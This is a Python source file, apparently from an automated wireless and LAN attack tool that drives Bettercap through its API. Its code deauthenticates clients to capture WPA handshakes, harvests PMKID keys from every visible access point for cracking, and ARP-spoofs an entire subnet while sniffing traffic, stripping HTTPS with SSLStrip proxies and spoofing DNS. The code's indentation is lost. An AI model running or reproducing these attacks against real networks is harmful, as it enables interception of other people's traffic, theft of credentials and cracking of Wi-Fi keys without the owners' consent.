def deauth_attack(bssid):
# Generate an unique handshake file name and set the path to be stored
handshake_file = './key_material/ ' + str(bssid) + '_' + time.strftime(
"%Y%m%d%H%M%S", time.gmtime()) + '.pcap'
delete_events()
post('set wifi.handshakes.file ' + handshake_file)
print('Launching a deauthentication attack against: ' + str(bssid))
attempts = 0
max_attempts = 10
while not (os.path.isfile(handshake_file) or attempts > max_attempts):
print('Access point clients are being deauthenticated...')
post('wifi.deauth ' + bssid)
attempts += 1
time.sleep(API_COOLDOWN)
# Check if the captured .pcap is valid
time.sleep(API_COOLDOWN)
if (os.path.isfile(handshake_file)):
if (crack.pcap_to_hccapx(handshake_file)):
print('Handshake of ' + str(bssid) + ' captured successfully.')
get_handshake_info(handshake_file.split('/')[-1])
# Captured file does not have enough data
else:
print('No handshake has been captured with success.')
elif attempts > max_attempts:
print(
'Maximum number of attempts reached, no handshake has been captured with success.'
)
def request_aps():
# Start the Bettercap WiFi module
post('wifi.recon on')
# JSON with the APs information
aps_request = get('session/wifi')
aps_json = json.loads(aps_request.text)['aps']
return aps_json
def get_net_json():
# Start the Bettercap Ethernet module
post('net.probe on')
time.sleep(API_COOLDOWN)
net_request = get('session/lan')
net_json = json.loads(net_request.text)['hosts']
return net_json
def pmkid_attack():
print(
'\nLaunching a PMKID client-less attack to all visible access points.')
# Generate a new .pcap file if new PMKID keys are retrieved
pmkid_file = './key_material/pmkid_keys_' + time.strftime(
"%Y%m%d%H%M%S", time.gmtime()) + '.pcap'
post('set wifi.handshakes.file ' + pmkid_file)
post('wifi.recon on')
post('wifi.assoc all')
time.sleep(API_COOLDOWN * 2) # Time needed to associate all APs
if (os.path.isfile(pmkid_file)):
if (crack.pcap_to_hccapx(pmkid_file)):
print('PMKID keys captured: ' + pmkid_file.split('/')[-1])
#exit()
else:
print(
'No PMKID key were captured. Not all access points are vulnerable to this attack.'
)
#exit()
if not (os.path.isfile(pmkid_file)):
print(
'No PMKID key were captured. Not all access points are vulnerable to this attack.'
)
def apply_policy(self, new_parameters):
logging.info('[smart] Updating parameters with the new policy.')
for name, new_value in new_parameters.items():
if name in self.parameters:
current_value = self.parameters[name]
# Update the parameter value
if current_value != new_value:
self.parameters[name] = new_value
logging.info('[smart] Updating ' + str(name) + ': ' +
str(new_value))
post('set wifi.ap.ttl ' + str(self.parameters['ap_ttl']))
post('set wifi.sta.ttl ' + str(self.parameters['station_ttl']))
post('set wifi.rssi.min ' + str(self.parameters['min_rssi']))
def arp_spoof(args):
post('net.probe on')
if args.target == '*':
print('\nARP Spoofing all network clients...')
else:
print('\nARP Spoofing ' + args.target + '...')
post('set arp.spoof.internal true')
#post('set arp.spoof.fullduplex true')
if args.target == '*':
post('set arp.spoof.targets 192.168.1.*')
else:
post('set arp.spoof.targets ' + args.target)
# Generate a .pcap file where all the traffic is going to be logged
pcap_file = './key_material/arp_spoof_' + time.strftime("%Y%m%d%H%M%S", time.gmtime()) + '.pcap'
print('All traffic will be logged at: ' + pcap_file)
post('set net.sniff.output ' + pcap_file)
post('set net.sniff.local true')
time.sleep(API_COOLDOWN)
# Start HTTP and HTTPS proxies with SSLStrip deployed to attempt to decrypt HTTPS traffic
if args.proxies:
print('Deploying HTTP and HTTPS proxies with SSLStrip...')
post('set http.proxy.sslstrip true')
post('set https.proxy.sslstrip true')
post('http.proxy on')
post('https.proxy on')
if args.dns:
print('Spoofing DNS queries (redirections defined in dns.spoof.hosts file)')
post('set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on')
# Start the ARP Spoof + sniff the network
post('arp.spoof on')
post('net.sniff on')
print('\nSniffing traffic...')
while(True):
time.sleep(API_COOLDOWN)
spoof_summary()